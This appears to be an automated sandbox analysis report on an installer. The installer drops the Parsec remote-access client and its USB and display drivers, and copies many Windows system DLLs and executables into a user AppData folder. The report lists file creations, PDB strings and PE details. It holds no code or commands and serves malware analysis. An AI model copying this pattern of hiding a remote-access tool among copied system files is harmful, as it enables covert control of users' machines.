Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | Automated click: Next
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Automated click: Next >
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\firewall-add.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\firewall-remove.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\service-install.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\wscripts\service-remove.vbs
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\vusb
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\vusb\parsec-vud.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\vdd
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\vdd\parsec-vdd.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\teams.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\parsecd.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\pservice.exe
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\skel
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\skel\parsecd-150-93b.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\skel\appdata.json
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Directory created: C:\Program Files\Parsec\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbuninstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Directory created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vdduninstall.bat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.cat
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.inf
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\mm.man
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ParsecVUD
Source: uu8v4UUzTU.exeStatic file information: File size 50493432 > 1048576
Source: uu8v4UUzTU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: RdpSaUacHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ws2help.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SystemEventsBrokerClient.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: RdpSaUacHelper.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SyncInfrastructurePS.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\magic-mirror\driver\x64\Release\mm.pdb source: nefconw.exe, 00000049.00000003.2474352730.000002868CACB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: verifier.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\parsecvirtualds\src\x64\Release\parsecvirtualds.pdb source: nefconw.exe, 00000038.00000002.2444060898.000001AFE1992000.00000004.00000020.00020000.00000000.sdmp, nefconw.exe, 00000038.00000003.2443146793.000001AFE1992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SocialApis.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: NetworkHelper.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: icuin.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: SyncInfrastructurePS.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MCRecvSrc.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: WSClient.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbda3.pdb source: uu8v4UUzTU.tmp, 00000002.00000002.2291864507.000000000018C000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: MFWMAAEC.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.ApplicationModel.ConversationalAgent.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdibm02.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wkbdarmty.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dskquoui.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wups.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\gitsrc\parsec-cloud\usb-ip\pcvudhc\x64\Release\parsecvusba.pdb source: drvinst.exe, 00000036.00000003.2374772071.000002849F521000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SystemEventsBrokerClient.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: lockappbroker.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: dmcfgutils.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: verifier.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: netlogon.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wiashext.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: TpmTool.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: sscore.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: xpsservices.pdb source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Windows.UI.pdbUGP source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cryptdlg.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: uu8v4UUzTU.tmp, 00000002.00000003.2276467221.00000000059D3000.00000004.00001000.00020000.00000000.sdmp
Source: is-IH0UT.tmp.2.dr | Static PE information: 0xC9B97BBC [Wed Mar 31 00:30:52 2077 UTC]
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FC6550 GetCurrentProcess,GetProcessTimes,memset,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,fputs,fputs,fputs, | 6_2_00FC6550
Source: uu8v4UUzTU.exe | Static PE information: section name: .didata
Source: uu8v4UUzTU.tmp.0.dr | Static PE information: section name: .didata
Source: is-0HD4S.tmp.2.dr | Static PE information: section name: .didat
Source: is-JR54E.tmp.2.dr | Static PE information: section name: .didat
Source: is-IQ3DU.tmp.2.dr | Static PE information: section name: .didat
Source: is-JBM9N.tmp.2.dr | Static PE information: section name: .didata
Source: is-OGENO.tmp.2.dr | Static PE information: section name: .didat
Source: is-4URGO.tmp.2.dr | Static PE information: section name: .didat
Source: is-RT5NS.tmp.2.dr | Static PE information: section name: .didat
Source: is-514OT.tmp.2.dr | Static PE information: section name: .didat
Source: is-BT11A.tmp.2.dr | Static PE information: section name: .didat
Source: is-6QS3I.tmp.2.dr | Static PE information: section name: .didat
Source: is-MAETF.tmp.2.dr | Static PE information: section name: .didat
Source: is-CFLCO.tmp.2.dr | Static PE information: section name: .didat
Source: is-2DG57.tmp.2.dr | Static PE information: section name: .didat
Source: is-MRTFO.tmp.2.dr | Static PE information: section name: .didat
Source: is-9PV08.tmp.2.dr | Static PE information: section name: .didat
Source: is-G3B26.tmp.2.dr | Static PE information: section name: .didat
Source: is-9HF18.tmp.2.dr | Static PE information: section name: .didat
Source: is-NSRV7.tmp.2.dr | Static PE information: section name: .didat
Source: is-CEP95.tmp.2.dr | Static PE information: section name: .didat
Source: is-LQSSJ.tmp.2.dr | Static PE information: section name: .didata
Source: is-I559Q.tmp.2.dr | Static PE information: section name: .didat
Source: teams.exe.13.dr | Static PE information: section name: _RDATA
Source: parsecd.exe.13.dr | Static PE information: section name: _RDATA
Source: pservice.exe.13.dr | Static PE information: section name: _RDATA
Source: parsecd-150-93b.dll.13.dr | Static PE information: section name: .detourc
Source: parsecd-150-93b.dll.13.dr | Static PE information: section name: .detourd
Source: parsecd-150-93b.dll.13.dr | Static PE information: section name: _RDATA
Source: nefconc.exe.45.dr | Static PE information: section name: .detourc
Source: nefconc.exe.45.dr | Static PE information: section name: .detourd
Source: nefconc.exe.45.dr | Static PE information: section name: _RDATA
Source: nefconw.exe.45.dr | Static PE information: section name: .detourc
Source: nefconw.exe.45.dr | Static PE information: section name: .detourd
Source: nefconw.exe.45.dr | Static PE information: section name: _RDATA
Source: parsecvusba.sys.45.dr | Static PE information: section name: PAGED
Source: SET614C.tmp.52.dr | Static PE information: section name: PAGED
Source: SET638E.tmp.54.dr | Static PE information: section name: PAGED
Source: nefconw.exe.65.dr | Static PE information: section name: .detourc
Source: nefconw.exe.65.dr | Static PE information: section name: .detourd
Source: nefconw.exe.65.dr | Static PE information: section name: _RDATA
Source: mm.dll.65.dr | Static PE information: section name: _RDATA
Source: SET8ABC.tmp.73.dr | Static PE information: section name: _RDATA
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F9F496 push rcx; ret | 6_2_00F9F497
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD04569C push rax; retf 0000h | 39_2_00007FF7CD04569D
Source: is-MRTFO.tmp.2.dr | Static PE information: section name: .text entropy: 7.183765567357945

Persistence and Installation Behavior

Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\329B6147266C1E26CD774EA22B79EC2E
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\329B6147266C1E26CD774EA22B79EC2E
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1A374813EDB1A6631387E414D3E73232
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1A374813EDB1A6631387E414D3E73232
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-GF1GP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-E9NUA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-6QS3I.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\wiashext.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\rdvgocl32.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\wlanext.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-LQSSJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-ETRQM.tmp
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-UEG3C.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-MAETF.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | File created: C:\Program Files\Parsec\pservice.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-4URGO.tmp
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\nsExec.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | File created: C:\Program Files\Parsec\vusb\parsec-vud.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | File created: C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\System.dll
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-RT5NS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\kbdarmty.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-9PV08.tmp
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | File created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-E0QD0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-2UJJU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\networkhelper.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-DPGTR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\xpsservices.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-JR54E.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\kbd101b.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-9HF18.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | File created: C:\Program Files\Parsec\uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\mfc140enu.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-CR69T.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-I559Q.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-MRTFO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\is-O65TT.tmp
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | File created: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET7030.tmp
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp | File created: C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)
